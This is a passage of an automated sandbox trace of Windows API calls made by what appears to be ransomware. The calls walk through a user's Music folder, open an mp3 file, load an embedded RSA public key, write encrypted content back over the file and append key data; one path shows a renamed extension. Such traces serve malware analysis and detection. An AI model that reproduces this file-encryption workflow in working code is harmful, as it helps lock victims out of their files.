halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\010dt.wav.lokf")) returned 1 [0060.769] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.769] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.769] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.770] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708d3af0, ftCreationTime.dwHighDateTime=0x1d4cfae, ftLastAccessTime.dwLowDateTime=0x413d7640, ftLastAccessTime.dwHighDateTime=0x1d4c674, ftLastWriteTime.dwLowDateTime=0x413d7640, ftLastWriteTime.dwHighDateTime=0x1d4c674, nFileSizeHigh=0x0, nFileSizeLow=0xcbc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0rf9GWEzIubnTo8mKkZ.mp3", cAlternateFileName="0RF9GW~1.MP3")) returned 1 [0060.770] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.770] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\0rf9GWEzIubnTo8mKkZ.mp3") returned=".mp3" [0060.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\0rf9GWEzIubnTo8mKkZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\0rf9gweziubnto8mkkz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.770] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=52165) returned 1 [0060.770] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.773] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcb9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.773] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.773] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.773] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xcbc5, lpOverlapped=0x0) returned 1 [0060.774] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.774] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.774] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.774] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.775] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.775] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.775] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.775] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.775] GetLastError () returned 0x0 [0060.775] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.775] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.775] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.775] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.775] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcbd0) returned 0x9c8bae8 [0060.775] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89958 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85fc8 [0060.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c899a0 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85fe0 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86010 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86028 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.776] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86010 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86028 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86010 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86010 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.777] GetCurrentThreadId () returned 0x9e0 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b720 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.777] GetCurrentThreadId () returned 0x9e0 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86010 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86028 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ff8 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86040 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.778] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86010 | out: hHeap=0x660000) returned 1 [0060.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86010 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86010 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ff8 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85fe0 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c899a0 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.780] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0xcbc0, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0xcbc0, lpOverlapped=0x0) returned 1 [0060.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.780] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcbc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.780] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 